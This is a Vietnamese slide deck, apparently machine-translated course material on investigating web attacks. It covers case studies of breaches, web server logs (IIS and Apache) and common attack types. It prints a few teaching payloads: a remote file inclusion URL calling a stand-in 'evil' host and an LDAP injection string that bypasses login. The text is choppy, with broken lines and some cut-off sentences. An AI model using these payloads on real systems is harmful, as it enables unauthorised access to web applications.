Module 18 điều tra các cuộc tấn công web

Nghiên cứu tình huốngNhà nghiên cứu bảo mật Secunia cho biết một "lỗ hổng cực kỳ nghiêm trọng" trong Microsoft Word 2000 hiện đang bị khai thác bởi những kẻ tấn công nguy hiểm, có thể dẫ

Điều tra các cuộc tấn công web

Tin tức: Cuộc tấn công vào PNNL bắt đầu tại Máy chủ Web Công cộng

Zero-day Flash payload đã lây nhiễm cho khách truy cập vào máy chủ Web công khai của nhà thầu Pacific Northwest National Lab của Bộ Năng lượng.

Cuộc tấn công mạng được phát hiện tại Phòng thí nghiệm Quốc gia Tây Bắc Thái Bình Dương (PNNL) trong kỳ nghỉ cuối tuần ngày 4 tháng 7 đã sử dụng kết hợp lỗ hổng máy chủ Web và một trọng tải đã gây ra cuộc tấn công zero-day Adobe Flash , theo các quan chức tại Bộ Năng lượng.

PNNL, một cơ sở nghiên cứu và phát triển được vận hành theo hợp đồng với Bộ Năng lượng, đã phát hiện ra thứ mà họ mô tả

là một cuộc tấn công có chủ đích "tinh vi" vào hệ thống của mình vào thứ Sáu trước kỳ nghỉ lễ, buộc tổ chức phải tạm thời hủy

bỏ hầu hết các dịch vụ mạng nội bộ của mình, bao gồm email, SharePoint, ạng LAN không dây, thư thoại và truy cập Internet.

PNNL cũng đã chặn lưu lượng truy cập nội bộ trong khi

điều tra và giảm nhẹ vụ tấn công Phòng thí nghiệm

cho biết không có thông tin được phân loại hoặc nhạy

cảm nào được truy cập trong cuộc tấn công.

Tin tức pháp y

Vụ bắt giữ gây chú ý của Nhóm hacker trơ ​​trẽn LulzSec

Khi các nghi phạm di chuyển, Ryan Cleary trông không có vẻ gì nguy hiểm: một thanh niên 19 tuổi nhợt nhạt trông trẻ hơn 5 tuổi, mặc áo phông trượt ván trắng và quần thể thao, đang đứng lo lắng trong phòng

xử án ở đây hôm thứ Năm.

Nhưng các cáo buộc của cảnh sát Anh liên kết ông Cleary với một nhóm tấn công có tên là Lulz Security, hay LulzSec, nhóm tội phạm Internet trong những tuần gần đây, tấn công các trang web và mạng máy tính bao gồm cả Thượng viện Hoa Kỳ, Cơ quan Tình báo Trung ương và Sony.

Các tờ báo lá cải của Anh đã nhanh chóng chọn ông Cleary là kẻ chủ mưu tội phạm trẻ tuổi đứng sau LulzSec, gọi ông là "Hack the Lad" trên các tiêu đề trang nhất Mẹ của anh, bà Rita, cho biết con trai bà rất thông minh nhưng lại có tiền sử bệnh tâm thần, bao gồm

chứng sợ chứng sợ hãi Luật sư của ông, Ben Cooper, mô tả ông Cleary là "một thanh niên dễ bị tổn thương."

Mặc dù không rõ ông ta phải chịu bao nhiêu tai tiếng, nhưng việc bắt giữ ông Cleary đã khiến ông trở thành tâm điểm chú ý của công chúng với làn sóng các vụ hack máy tính, được thực hiện bởi các tập thể trực tuyến vô định hình.

Cảnh sát cho rằng ông Cleary phạm tội sử dụng trái phép máy tính để thực hiện các cuộc tấn công từ chối dịch vụ, tấn công các trang Web có nhiều thông báo tự động đến nỗi chúng phải đóng cửa Họ nói rằng mục tiêu của anh ta là các tổ chức bao gồm Cơ quan Tội phạm Có Tổ chức Nghiêm trọng của Anh.

Kịch bản

Ba công dân Nga bị buộc tội tống tiền các công ty thương mại điện tử của Vương quốc Anh vào ngày 4 tháng 10 năm 2006 Ivan Maksakov, Alexander Petrov và Denis Stepanov bị buộc tội nhận 4 triệu đô la từ các công ty của Vương quốc Anh Bộ ba tập trung vào các trang web cờ bạc trên Internet của Vương quốc Anh, thu thập thông tin về các sòng bạc trên web của Anh và văn phòng của các nhà cái bằng cách sử dụng phần mềm gián điệp do một trong các thành viên thiết kế Sau

đó, họ yêu cầu tiền chuộc từ chủ sở hữu của các trang web như vậy bằng cách đe dọa họ bằng các cuộc tấn công Từ chối Dịch vụ

Trong sáu tháng hoạt động của mình, bị cáo đã tấn công hơn 54 máy chủ web ở 30 quốc gia khác nhau Đơn vị Tội phạm Công nghệ cao Quốc gia Anh (NHTCU) và các nhà chức trách Nga đã điều tra

vụ việc này và bắt giữ chúng

Nghiên cứu tình huống

Nhà nghiên cứu bảo mật Secunia cho biết một "lỗ hổng cực kỳ nghiêm trọng" trong Microsoft Word 2000 hiện đang bị khai thác bởi những kẻ tấn công nguy hiểm, có thể dẫn đến việc thực thi mã từ xa trên hệ thống của người dùng.

Lỗ hổng này ảnh hưởng đến các hệ thống chạy Windows 2000 và xảy ra khi xử lý các tài liệu Word 2000 độc hại, theo cố vấn bảo mật của Secunia.

Công ty bảo mật Symantec, mà cách đây vài ngày đã phát hiện ra vụ khai thác, Trojan MDropper.Q, lưu ý rằng họ sử dụng một cuộc tấn công hai bước.

Trojan MDropper.Q khai thác lỗ hổng Microsoft Word để đánh rơi một tập tin khác, một biến thể mới của Backdoor Femo, theo tư vấn bảo mật của Symantec.

"Cũng như các lỗ hổng Office (Microsoft) gần đây khác, các tài liệu kết hợp mã khai thác phải được mở bằng bản sao dễ bị tấn công của Microsoft Word 2000 để nó hoạt động", lời khuyên của Symantec "Như vậy, nó làm cho lỗ hổng bảo mật không thích hợp để tạo ra các sâu mạng tự tái tạo."

Microsoft vẫn chưa phát hành bản vá cho lỗ hổng bảo mật và người dùng được khuyến cáo từ bỏ việc mở các tài liệu không đáng tin cậy Lần khai thác lỗ hổng Office mới nhất này diễn ra sau một cuộc tấn công độc hại tương tự vào tháng 6 Trong trường hợp cụ thể đó, hệ thống của người dùng sẽ bị nhiễm khi mở một tài liệu Excel độc hại có tên "okN.xls" Tệp độc hại đó chứa mã Trojan Mdropper.J, sau đó

đã loại bỏ chương trình Booli.A trên hệ thống của người dùng Booli.A sau đó sẽ tải nhiều tệp độc hại hơn vào PC của người dùng.

• Giới thiệu về Ứng dụng Web

• Kiến trúc ứng dụng web

• Tại sao máy chủ web bị xâm phạm

• Tổng quan về Nhật ký Web

• Nhật ký Dịch vụ Thông tin Internet (IIS)

• Nhật ký máy chủ web Apache

• Tấn công web

• Điều tra các cuộc tấn công web

• Điều tra các cuộc tấn công web trong máy chủ dựa trên Windows

• Điều tra nhật ký IIS và Apache

• Giao diện trang web

• Chiến lược bảo mật cho ứng dụng web

• Công cụ phát hiện tấn công web

• Công cụ định vị địa chỉ IP

Các mô-đun

Giới thiệu về Ứng dụng Web và Máy chủ Web

Thống kê bảo mật ứng dụng web

Thị trường chia sẻ máy chủ

Giới thiệu về Ứng dụng Web

Ứng dụng web cung cấp giao diện

giữa người dùng cuối và máy chủ

web thông qua một tập hợp các

trang web được tạo ở cuối máy chủ

hoặc chứa mã tập lệnh để được thực

thi động trong trình duyệt web của

máy khách

Mặc dù các ứng dụng web thực thi một số chính sách bảo mật nhất định, nhưng chúng dễ bị tấn công bởi các cuộc tấn công khác nhau như SQL injection, cross-site scripting, session hijacking, v.v

Thành phần ứng dụng web

Cách các ứng dụng web hoạt động

Ứng dụng web DBMS

Hệ điều hành

Kiến trúc ứng dụng web

Kiến trúc máy chủ trang web nguồn mở

Dấu hiệu của một cuộc tấn công web

Khách hàng bị từ chối mọi quyền truy cập vào thông tin hoặc dịch vụ có trên trang web

Một trang web hợp pháp được chuyển hướng đến một trang web không xác định

Hiệu suất mạng chậm bất thường và máy chủ thường xuyên khởi động lại

Các điểm bất thường được tìm thấy trong các tệp nhật ký

Vec-tơ của các cuộc tấn công web

Vectơ tấn công là một con đường

hoặc phương tiện mà kẻ tấn công

có thể truy cập vào máy tính hoặc

tài nguyên mạng để thực hiện một

cuộc tấn công trọng tải hoặc gây ra

một kết quả độc hại

Các vectơ tấn công bao gồm thao tác tham số, nhiễm độc XML, xác thực máy khách, định cấu hình sai máy chủ, các vấn đề định tuyến dịch

vụ web và kịch bản trang web chéo

Không có phương pháp bảo vệ nào

là hoàn toàn "chống tấn công" vì các vectơ tấn công liên tục thay đổi

và phát triển với sự phát triển công nghệ mới

Tại sao Máy chủ Web bị xâm phạm

Quyền đối với tệp và thư mục không phù hợp

Chứng chỉ SSL bị định cấu hình sai

và cài đặt mã hóa

Lỗi trong phần mềm máy chủ, hệ điều hành và ứng dụng web

Sử dụng chứng chỉ tự

ký và chứng chỉ mặc định

Cài đặt máy chủ với cài đặt mặc định

Đã bật các dịch

vụ không cần thiết, Bao gồm quản lý nội dung và quản trị

từ xa

Xác thực không đúng với các hệ thống bên ngoài

Xung đột bảo mật với trường hợp dễ sử dụng trong kinh doanh

Tài khoản mặc định với mật khẩu mặc định của họ

Các lỗi bảo mật chưa được khắc phục trong phần mềm máy chủ, hệ điều hành và các ứng dụng

Tác động của các cuộc tấn công máy chủ web

Giả mạo dữ liệu

Gây hại cho tài khoản người dùng

Tấn công đổi giao diện web

Tấn công đổi giao diện web

Làm mất giao diện trang web

xảy ra khi kẻ xâm nhập có ác

ý làm thay đổi giao diện trực

quan của trang web bằng

cách chèn hoặc thay thế dữ

liệu mang tính khiêu khích và

gây khó chịu

Các trang bị xóa sẽ khiến

khách truy cập tiếp xúc với

một số thông tin tuyên truyền

trái phép hoặc gây hiểu lầm

cho đến khi bị phát hiện và

sửa chữa những thay đổi trái

phép

Nghiên cứu tình huống

Người dung truy cập các trang web của các đại

diện quốc hội như Charles Gonzalez(Quận 20 của

Texas) Spencer Bachus (quận thứ 8 của

Alabama) và Brain Bard (Quận 3 của

Washington) đã nhận thông báo từ Red Eye

Crew

Mặc dù nguyên nhân thực sự của lỗi không rõ

rang, nhưng có thể quan sát thấy rằng các trang

bị làm mờ đều đang chạy trên Joomla CMS

NHẬT KÝ TRANG WEB

Tệp nhật ký có mã trạng thái HTTP cụ thể cho từng loại sự cố

Máy chủ web chạy trên IIS hoặc Apache dễ bị xóa tệp nhật ký bởi những kẻ tấn công có quyền truy cập vào máy chủ web, vì tệp nhật ký được lưu trữ trên chính máy chủ web

Nhật ký ứng dụng

Nhật ký ứng dụng bao gồm tất cả các sự kiện

được ghi lại bởi các chương trình

Các sự kiện được ghi vào nhật ký ứng dụng

được xác định bởi các nhà phát triển chương

trình phần mềm

Thông tin loại nhật ký phổ biến:

• Yêu cầu của khách hàng và phản hồi của

máy chủ

• Thông tin tài khoản

• Thông tin sử dụng

• Các hoạt động vận hành quan trọng

Nhật ký Dịch vụ Thông tin Internet (IIS)

• Dịch vụ thông tin Internet (IIS) là một máy chủ web dành cho máy chủ Windows lưu trữ mọi thứ trên Web

• Nhật ký IIS cung cấp thông tin hữu ích về hoạt động của các ứng dụng Web khác nhau

Thời gian

kết nối

Địa chỉ IP

Tài khoản người dùng

Trang duyệt

Hành động

Kiến trúc máy chủ web IIS

Dịch vụ Thông tin Internet (IIS) dành cho Windows Server là một máy chủ Web linh hoạt, an toàn và dễ quản

lý để lưu trữ mọi thứ trên Web

cơ bản, chẳng hạn như địa chỉ IP

máy khách, tên người dung, ngày

và giờ, dịch vụ và phiên bản, tên

máy chủ và địa chỉ IP, loại yêu

cầu, mục tiêu hoạt động,v.v

Ví dụ mục nhập tệp nhật ký IIS như

được xem trong soạn thảo vb

Nhật ký máy chủ web Apache

Apache HTTP Server là

một máy chủ web hỗ trợ

nhiều hệ điều hành như

Unix, GNU, FreeBSD,

Linux, Solaris, Novell

NetWare, AmigaOS, Mac

OS X, Microsoft

Windows, OS / 2 và TPF

Nhật ký Apache cung cấp thông tin về web& các hoạt động ứng dụng:

• Địa chỉ IP của máy khách

• Identd của máy khách

Tấn công web

Tấn công trang web - 1

Tại sao Máy chủ Web bị xâm phạm

Giả mạo tham số / biểu mẫu

Một cuộc tấn công giả mạo thông số web liên quan đến việc thao tác các thông số

được trao đổi giữa máy khách và máy chủ để sửa đổi dữ liệu ứng dụng như thông

tin xác thực và quyền của người dùng, giá cả và số lượng sản phẩm

Tấn công giả mạo tham số khai thác các lỗ hổng trong cơ chế xác thực tính toàn

Truyền tải thư mục

• Truyền tải thư mục cho phép kẻ tấn công truy cập các thư mục bị hạn chế bao gồm mã nguồn ứng dụng, cấu hình và các tệp hệ thống quan trọng cũng như thực thi các lệnh bên ngoài thư mục gốc của máy chủ web

• Những kẻ tấn công có thể thao túng các biến tham chiếu tệp có trình tự slash ( /)" và các biến thể của chúng

"dot-dot-Truy cập các tệp nằm bên ngoài thư mục xuất bản web bằng cách sử dụng truyền qua thư mục

Mã nguồn máy chủ dễ bị tấn công

Cấu hình bảo mật sai

Khai thác dễ dàng

Sử dụng lỗ hổng định cấu hình sai, những kẻ tấn công có

quyền truy cập trái phép vào tài khoản mặc định, đọc các

trang không sử dụng, khai thác các lỗ hổng chưa được vá và

đọc / ghi các tệp và thư mục không được bảo vệ, v.v.

Tỷ lệ phổ biến

Cấu hình sai bảo mật có thể xảy ra ở bất kỳ cấp độ nào

của ngăn xếp ứng dụng, bao gồm nền tảng, máy chủ

web, máy chủ ứng dụng, khung và mã tùy chỉnh

Ví dụ

• Bảng điều khiển quản trị máy chủ ứng dụng được tự

động cài đặt và không bị gỡ bỏ

• Các tài khoản mặc định không được thay đổi

• Attacker phát hiện ra các trang quản trị tiêu chuẩn trên

máy chủ, đăng nhập bằng mật khẩu mặc định và chiếm

quyền

• Các lỗi injection phổ biến trong mã kế thừa, thường được tìm thấy trong các truy vấn SQL, LDAP và XPath, v.v và

có thể dễ dàng phát hiện bằng các trình quét và trình đánh dấu lỗ hổng ứng dụng

Nó liên quan đến injection của SQL độc hại truy vấn vào form đầu vào của người dùng

Nó liên quan đến việc injection mã độc thông qua một ứng dụng web

Nó liên quan đến việc đưa vào các câu lệnh LDAP độc hại

• Các cuộc tấn công SQL Injection thường có thể được thực hiện từ thanh địa chỉ, từ bên trong các trường ứng dụng và thông qua các truy vấn và tìm kiếm

Lệnh của các cuộc tấn công injection

Kẻ tấn công cố gắng tạo một chuỗi đầu vào để có được quyền truy cập trình bao vào máy chủ web

Các hàm Shell Injection bao gồm system (), StartProcess (), java.lang.Runtime.exec (), System.Diagnostics.Process.Start () và các API tương tự

Loại tấn công này được sử dụng để phá hoại các trang web Sử dụng cuộc tấn công này, kẻ tấn công thêm nội dung dựa trên HTML bổ sung vào ứng dụng web dễ bị tấn công Trong các cuộc tấn công nhúng HTML, đầu vào của người dùng vào tập lệnh web được đặt vào HTML đầu ra, mà không được kiểm tra mã HTML hoặc tập lệnh

Kẻ tấn công khai thác lỗ hổng này và đưa mã độc vào các tệp hệ thống

http://www.juggyboy.com/vulnerable.php?COLOR=http://evil/exploit?

Ví dụ lệnh Injection

1 Kẻ tấn công nhập mã độc hại (Số tài

khoản) bằng mật khẩu mới

2 Hai bộ số cuối cùng là kích thước biểu ngữ

3 Sau khi kẻ tấn công nhấp vào nút gửi, mật

khẩu của tài khoản 1036 được thay đổi thành

từ "mật khẩu mới“

4 Tập lệnh máy chủ giả định rằng chỉ có URL

của tệp hình ảnh biểu ngữ được chèn vào

trường đó

Kẻ tấn công sử dụng

các dòng lệnh để thực

máy chủ đã được khai thác trong cuộc tấn công này, sử dụng lệnh INSERT cơ sở dữ liệu và UPDATE bản ghi

Tấn công file injection

Mã khách hàng đang chạy trong trình duyệt Mã PHP dễ bị tấn công

Chèn một tệp được lưu trữ kẻ tấn công từ xa được lưu trữ tại: www.jasoneval.com có

​​chứa khai thác

Các cuộc tấn công chèn tệp cho phép kẻ tấn công khai thác các tập lệnh dễ bị tấn công trên máy chủ để sử dụng tệp từ xa thay vì tệp được cho là đáng tin cậy từ hệ thống tệp cục bộ

LDAP Injection là gì ?

Kỹ thuật chèn LDAP được sử dụng để tận dụng các lỗ hổng đầu vào của ứng dụng web chưa được xác thực để vượt qua bộ lọc LDAP được sử dụng để tìm kiếm Dịch vụ thư mục để có được quyền truy cập trực tiếp vào cơ sở dữ liệu phía sau cây LDAP

Cách thức hoạt động của LDAP Injection

1 Các cuộc tấn công LDAP Injection tương tự như các cuộc tấn công SQL Injection, nhưng khai thác các tham số của người

dùng để tạo truy vấn LDAP

2 Để kiểm tra xem một ứng dụng có dễ bị chèn mã LDAP hay không, hãy gửi một truy vấn đến máy chủ tạo ra một đầu vào không hợp lệ Nếu máy chủ LDAP trả về lỗi, nó có thể được khai thác bằng các kỹ thuật chèn mã

Nếu kẻ tấn công nhập tên người dùng hợp lệ

"juggyboy" và chèn juggyboy) (&)) thì chuỗi URL sẽ trở thành (8 (USER = juggyboy) (&)) (PASS = blah))

Chỉ bộ lọc đầu tiên được xử lý bởi máy chủ LDAP, chỉ truy vấn (&(USER = juggyboy) (&)) được xử lý Truy vấn này luôn đúng, kẻ tấn công đăng nhập vào hệ thống mà không cần mật khẩu hợp lệ

Tấn công thao túng trường ẩn

1 Khi người dùng thực hiện lựa chọn trên một trang HTML, lựa chọn thường được lưu trữ dưới dạng các giá trị trường biểu mẫu và được gửi đến ứng dụng dưới dạng một yêu cầu HTTP

2 HTML cũng có thể lưu trữ các giá trị trường dưới dạng các trường ẩn, không được trình duyệt hiển thị trên màn hình nhưng được thu thập và gửi dưới dạng tham số trong quá trình gửi biểu mẫu

3 Những kẻ tấn công có thể kiểm tra mã HTML của trang và thay đổi các giá trị trường ẩn để thay đổi yêu cầu đăng lên máy chủ